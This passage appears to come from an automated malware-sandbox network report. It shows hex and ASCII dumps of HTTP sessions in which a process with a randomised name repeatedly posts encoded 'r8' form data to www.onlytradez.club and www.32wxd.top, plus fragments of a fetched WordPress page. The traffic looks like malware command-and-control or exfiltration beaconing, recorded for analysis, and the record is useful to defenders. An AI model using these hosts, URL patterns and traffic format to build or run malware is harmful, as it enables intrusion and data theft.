                                        Sep 3, 2024 13:54:10.176103115 CEST448INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                        Sep 3, 2024 13:54:10.176197052 CEST1236INData Raw: 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65
                                        Data Ascii: ON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Work
                                        Sep 3, 2024 13:54:10.176208019 CEST224INData Raw: 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d
                                        Data Ascii: ttings);</script><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
                                        Sep 3, 2024 13:54:10.176213980 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                                        Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                                        Sep 3, 2024 13:54:10.176219940 CEST224INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                                        Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1e
                                        Sep 3, 2024 13:54:10.176335096 CEST1236INData Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                                        Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                                        Sep 3, 2024 13:54:10.176347971 CEST1236INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                                        Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background
                                        Sep 3, 2024 13:54:10.176361084 CEST1236INData Raw: 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b
                                        Data Ascii: lor--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vi
                                        Sep 3, 2024 13:54:10.181113958 CEST1236INData Raw: 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36
                                        Data Ascii: rum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(15


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.449746167.172.133.32806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:15.304673910 CEST752OUTPOST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2b 42 72 76 52 5a 4d 69 6b 4f 73 38 78 66 37 4f 59 76 59 6b 35 69 66 43 32 54 4c 36 70 76 66 4d 55 51 4a 41 77 6f 41 48 5a 34 30 73 51 4f 53 77 4b 31 32 57 71 38 39 41 6e 4d 6e 43 71 70 39 61 75 73 34 78 6f 2b 4e 63 64 39 57 70 62 4a 67 6b 72 4f 44 66 53 52 6c 46 50 6c 47 74 4f 4b 30 44 55 38 41 78 33 62 43 42 32 77 69 61 45 64 6b 38 68 44 56 4b 44 44 72 39 6e 69 47 72 42 68 6a 4a 63 72 74 79 53 67 74 6d 63 70 35 56 71 66 42 6a 62 32 51 32 69 42 4f 69 49 4e 71 77 52 6f 4f 36 57 5a 34 73 70 6d 6d 59 31 48 46 35 71 68 46 37 58 6d 38 4c 67 67 3d 3d
                                        Data Ascii: r8=gQGQ44pjYQij+BrvRZMikOs8xf7OYvYk5ifC2TL6pvfMUQJAwoAHZ40sQOSwK12Wq89AnMnCqp9aus4xo+Ncd9WpbJgkrODfSRlFPlGtOK0DU8Ax3bCB2wiaEdk8hDVKDDr9niGrBhjJcrtySgtmcp5VqfBjb2Q2iBOiINqwRoO6WZ4spmmY1HF5qhF7Xm8Lgg==
                                        Sep 3, 2024 13:54:15.743071079 CEST369INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:15 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.449747167.172.133.32806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:17.846111059 CEST772OUTPOST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 37 4d 4e 79 42 41 33 5a 41 48 51 6f 30 73 62 75 53 31 4f 31 32 4a 71 38 67 39 6e 4a 66 43 71 70 70 61 75 75 67 78 70 50 4e 64 63 74 57 72 55 70 67 36 6d 75 44 66 53 52 6c 46 50 6c 44 77 4f 4b 4d 44 49 63 51 78 33 2f 57 43 38 51 69 5a 46 64 6b 38 77 7a 56 57 44 44 72 44 6e 6a 62 4f 42 6e 2f 4a 63 76 6c 79 53 78 74 35 4c 5a 35 54 33 76 42 32 65 55 6c 6c 73 67 4c 50 4f 74 75 70 4d 6f 53 63 65 2f 70 32 34 58 48 50 6e 48 68 4b 33 6d 4d 50 61 6c 42 43 37 67 66 44 6c 42 4f 4b 42 6a 44 53 53 50 4c 76 37 77 74 36 69 63 77 3d
                                        Data Ascii: r8=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pc7MNyBA3ZAHQo0sbuS1O12Jq8g9nJfCqppauugxpPNdctWrUpg6muDfSRlFPlDwOKMDIcQx3/WC8QiZFdk8wzVWDDrDnjbOBn/JcvlySxt5LZ5T3vB2eUllsgLPOtupMoSce/p24XHPnHhK3mMPalBC7gfDlBOKBjDSSPLv7wt6icw=
                                        Sep 3, 2024 13:54:18.275681019 CEST369INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:18 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.449748167.172.133.32806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:20.390868902 CEST10854OUTPOST /zctj/ HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.onlytradez.club
                                        Referer: http://www.onlytradez.club/zctj/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 10299
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 67 51 47 51 34 34 70 6a 59 51 69 6a 2f 6c 58 76 53 36 55 69 7a 65 73 37 74 50 37 4f 58 50 59 6f 35 69 54 43 32 57 36 2f 70 63 7a 4d 52 58 4e 41 30 2b 55 48 4b 6f 30 73 59 75 53 30 4f 31 32 41 71 38 34 78 6e 4a 61 31 71 72 52 61 68 72 30 78 68 64 6c 64 53 74 57 72 4d 5a 67 37 72 4f 43 4c 53 51 55 4d 50 6c 54 77 4f 4b 4d 44 49 65 34 78 67 37 43 43 76 41 69 61 45 64 6b 77 68 44 56 71 44 46 43 34 6e 6a 75 37 47 52 50 4a 63 4f 5a 79 51 43 46 35 4a 35 35 52 32 76 41 7a 65 55 34 39 73 6b 72 74 4f 75 79 54 4d 71 4f 63 64 72 41 30 6b 31 50 32 6c 78 78 30 6b 52 51 46 44 47 51 41 38 57 2f 48 31 44 2f 57 65 6a 33 62 50 63 69 33 2b 68 70 47 6a 4c 4c 54 42 6c 73 75 45 7a 78 6e 48 4a 36 72 64 4a 59 71 68 77 67 2f 67 59 50 57 33 35 36 78 6b 78 50 37 33 6e 72 55 67 6f 70 43 7a 33 58 50 35 32 43 4a 75 56 5a 44 4f 75 36 2f 67 56 7a 63 6b 61 55 69 56 51 54 6b 64 45 57 79 57 6e 33 66 47 47 66 7a 61 4a 38 46 55 34 47 6b 5a 66 48 6e 4c 48 6a 57 30 66 73 78 41 49 41 6f 37 49 38 44 32 4a 63 45 51 54 49 72 45 4d 47 [TRUNCATED]
                                        Data Ascii: r8=gQGQ44pjYQij/lXvS6Uizes7tP7OXPYo5iTC2W6/pczMRXNA0+UHKo0sYuS0O12Aq84xnJa1qrRahr0xhdldStWrMZg7rOCLSQUMPlTwOKMDIe4xg7CCvAiaEdkwhDVqDFC4nju7GRPJcOZyQCF5J55R2vAzeU49skrtOuyTMqOcdrA0k1P2lxx0kRQFDGQA8W/H1D/Wej3bPci3+hpGjLLTBlsuEzxnHJ6rdJYqhwg/gYPW356xkxP73nrUgopCz3XP52CJuVZDOu6/gVzckaUiVQTkdEWyWn3fGGfzaJ8FU4GkZfHnLHjW0fsxAIAo7I8D2JcEQTIrEMGk0YSJQKHzO5dmZAtQtbfpjbm5q0ZK5g5L/bKPqTnRlslKqaVDL9F88KFZjXJC6/FYIrBCVfupDVZ1E7bhIfv3tVIFOZ5OLS6N+Z/gmUJrZpU9XyzpB6gZDRXP5VzJGeCvk2zeZ8gDJ1fWsaGmZWFi5ChbAeWKBQBysa4SIcnnGEfZvqtwGcM1zDLyazyPHfKT0pgRb3/v9l2UfOZKqava84A1QTzgzcGz++jzcpjY/+aaaKdpqYZoXBiEBxGqtHaIcJ4cUYvYxV/cIZPEPKiJACb3m74lMVxsqs7jDypzbGMcZCHh4pgPsxVcYoFui6xDCq1iQSNvdrlOkfjdXlbtoApDvVzOdsyazUQE+/CRmDCA4pKZKQxGhsIt5UgmK2PRJCTV5k8nYK7DK+5INE83MSX0GbUBlSncb4/KHtmLBjhp1VCIKJjEGoTkCvH393+sGhBsLgNHtHRjLfN0gAznFQ1xyhIGnilF5SNvHhxYgHV9hxHFQGHWUSzJEtNallVog1lmmY8+u1FlSGDZzhFGzKUPs77R0vDy7oVWO515n8MNvjZd+jfF8n5iVgh2SRXSE1c+KgvewiLExItw05G341HdaudUmMPzM2eTebyWxYhxqE3wQYiayjC4rpVPGIaahnxugldpqRZJZkvUVwT/kri9aqi/WEPh8 [TRUNCATED]
                                        Sep 3, 2024 13:54:20.837920904 CEST369INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:20 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 23 c5 53 c8 45 14 3c e8 c5 2f 48 dd b5 09 a4 1b 89 11 ec df 9b 6a 0b e2 d9 a3 c7 9d 7d 33 0c a3 5d ee 82 99 cf b4 23 8b 46 67 9f 03 99 7a 59 c3 31 66 d8 c5 3b a3 96 6f 51 cb 17 52 d0 26 62 3f 58 ce c4 99 92 d1 4e 7d 3b 8a a2 e5 f8 1e b2 0b 34 5e dc 7a 7e 48 55 ad d6 95 fa 44 e4 14 2a a7 42 0b 21 c0 c2 d5 22 7a 6e 21 47 40 7f b3 4d 20 38 9c f6 5b b0 8c b0 71 29 76 04 97 e4 89 31 f4 40 29 c5 54 1c 2d 81 10 43 c1 7f c4 2f b7 78 02 1a 70 c3 f4 2b 02 00 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: b10D~@#SE</Hj}3]#FgzY1f;oQR&b?XN};4^z~HUD*B!"zn!G@M 8[q)v1@)T-C/xp+0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.449749167.172.133.32806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:22.932180882 CEST485OUTGET /zctj/?r8=tSuw7IYRRjv+wnLSX6BcwOUAvtHef9BV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEherCeW9gkiaKlQQJDWwurePQCYs04wJT4uh8=&VZ=qzwLUJ3Xbb28 HTTP/1.1
                                        Host: www.onlytradez.club
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Sep 3, 2024 13:54:23.349275112 CEST705INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.1
                                        Date: Tue, 03 Sep 2024 11:54:23 GMT
                                        Content-Type: text/html
                                        Content-Length: 555
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.449750206.119.82.116806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:28.565115929 CEST734OUTPOST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 199
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 2f 32 67 4a 79 76 75 67 42 2f 42 65 43 4a 53 2f 6e 5a 2f 37 62 67 51 31 41 61 48 42 30 55 4e 72 39 69 33 58 71 6b 4e 36 6e 47 32 44 6b 5a 73 4a 42 2b 78 38 37 78 56 30 56 31 39 5a 4b 52 4d 79 4d 78 6b 2b 4a 41 73 4b 70 61 51 6f 33 4a 71 68 74 6e 7a 41 78 38 5a 30 62 4e 5a 30 52 32 48 33 68 65 75 48 32 67 6e 52 73 61 7a 48 4e 31 6b 68 39 76 52 4e 54 31 2b 38 4e 35 6a 73 31 46 5a 4f 55 52 37 2b 38 78 4e 56 68 44 48 4a 59 46 78 45 73 6c 6a 41 51 44 66 4a 6d 62 55 4f 39 61 41 6a 67 46 68 49 6e 4e 71 63 65 63 6d 67 71 73 4d 57 56 35 66 52 41 3d 3d
                                        Data Ascii: r8=aBuNv8bUDAAzG/2gJyvugB/BeCJS/nZ/7bgQ1AaHB0UNr9i3XqkN6nG2DkZsJB+x87xV0V19ZKRMyMxk+JAsKpaQo3JqhtnzAx8Z0bNZ0R2H3heuH2gnRsazHN1kh9vRNT1+8N5js1FZOUR7+8xNVhDHJYFxEsljAQDfJmbUO9aAjgFhInNqcecmgqsMWV5fRA==
                                        Sep 3, 2024 13:54:29.417357922 CEST691INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 03 Sep 2024 11:54:29 GMT
                                        Content-Type: text/html
                                        Content-Length: 548
                                        Connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.449751206.119.82.116806016C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        TimestampBytes transferredDirectionData
                                        Sep 3, 2024 13:54:31.120153904 CEST754OUTPOST /kyiu/ HTTP/1.1
                                        Host: www.32wxd.top
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en;q=0.5
                                        Accept-Encoding: gzip, deflate
                                        Origin: http://www.32wxd.top
                                        Referer: http://www.32wxd.top/kyiu/
                                        Cache-Control: max-age=0
                                        Connection: close
                                        Content-Length: 219
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                        Data Raw: 72 38 3d 61 42 75 4e 76 38 62 55 44 41 41 7a 47 63 75 67 4d 52 33 75 31 52 2f 43 53 69 4a 53 30 48 5a 6a 37 62 73 51 31 42 75 58 42 43 38 4e 72 64 79 33 57 76 45 4e 35 6e 47 32 4c 45 5a 70 58 78 2b 41 38 37 38 32 30 55 4a 39 5a 4b 56 4d 79 4f 5a 6b 2f 36 6f 76 4c 35 61 57 30 33 4a 37 6c 74 6e 7a 41 78 38 5a 30 62 59 45 30 52 65 48 32 51 4f 75 56 44 41 6f 53 73 61 77 4e 74 31 6b 6c 39 75 57 4e 54 31 58 38 4d 6b 45 73 77 42 5a 4f 56 68 37 36 35 64 43 66 68 44 4e 58 6f 45 54 44 35 63 30 47 78 32 71 4b 6c 65 32 48 76 6a 69 72 47 55 37 5a 57 73 39 4f 65 34 56 39 74 6c 34 62 57 45 57 4b 49 6e 32 57 32 43 4b 36 33 5a 57 5a 42 32 5a 4e 45 70 6e 34 7a 45 3d
